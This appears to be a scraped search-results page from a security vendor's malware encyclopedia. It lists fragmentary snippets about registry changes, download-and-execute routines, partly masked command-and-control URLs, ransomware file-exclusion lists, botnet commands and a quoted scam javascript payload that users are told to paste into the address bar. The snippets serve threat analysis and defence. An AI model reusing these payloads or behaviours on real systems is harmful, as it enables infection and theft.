Search
Keyword: URL
\ WorkgroupCrawler\Shares shared = "\New Folder.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Internet Explorer\SearchScopes URL = "{random characters}" HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer
websites to download files: http://www.pta.gov.pk/index.php - non-malicious URL Note: The malware repeatedly connects to this URL, to perform its DDOS attack. It saves the files it downloads using the
CAB cab CMD cmd COM com cpl CPL exe EXE ini INI dll DLL lnk LNK url URL ttf TTF DECRYPT.txt It avoids encrypting files with the following strings in their file path: $RECYCLE.BIN rsa NTDETECT.COM ntldr
Microsoft Support site, it does look a legitimate Microsoft site only that the URL is not. The PC Support site fronts a Virus Removal Malware Support page wherein it visitors are guided through a step-by-step
designed to steal information from users. ZBOT variants typically access a URL where these retrieve a configuration file containing the list of websites these will monitor and steal information. Some reports
As of this writing, the said sites are inaccessible. NOTES: This Trojan sends the following system information to the URL {BLOCKED}8.net:6032 : CPU Speed Operating System used RAM System Language 12
environment. NOTES: Download Routine This malware attempts to connect to the following URL to download and execute another file: http://{BLOCKED}t.com/3/1.php?q={number} If download is successful, it signals the
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
}5u.{BLOCKED}33.info//e.js?'+Math.random(),facebookdigits.body.appendChild(activation);void(0) 2. Delete the actual address from the url field in your browser and paste the code instead. 3. Press Enter
XP, and Server 2003.) NOTES: As of this writing, the URL where the file can be downloaded is already inaccessible and it redirects to http://www.yahoo.co.jp . As a result, the downloaded file saved as
a virtual environment. NOTES: This spyware attempts to connect to the following URL to download and execute another file: http://{BLOCKED}t.com/3/1.php?q={number} If download is successful, it signals
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
the malware server Market - view a package specified by the malware server in the Android Market Web - view a URL specified by the malware server 12 for 2012: What Will The New Year Bring? Steals
(Default) = "%System%\MediaP.dll" NOTES: It connects to the following URL when Internet Explorer is opened: http://www.{BLOCKED}babys.com/cgi-bin/mmlogin.cgi Trojan.Win32.BHO.bnwy (Kaspersky), W32/BHO.BNWY
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
\Managechar.exe = %Application Data%\Managechar.exe NOTES: It connects to the following URL via HTTP GET to access other advertisement sites and possibly download other files into the system. However, during
value} NOTES: When a successful connection is made, this Trojan downloads a file from the URL with the parameters {Accessible URL}/get/faa91cf5e79a76602f094ed38fad5872.exe . If the malware failed to
Firefox)/ Chrome Service Pack (for Google Chrome) to certain web browsers: 1.crx (for Google Chrome) 2.xpi (for Mozilla Firefox) It connect to the following URL to update its stat counter: http://whos.
a URL using a hidden browser (POST): Send POST floods (QUIT): Terminate itself (SHELL EXEC): Execute shell command (SPEEDTEST): Check connection speed (STOP EXEC): Stop a specific thread (STOP GET):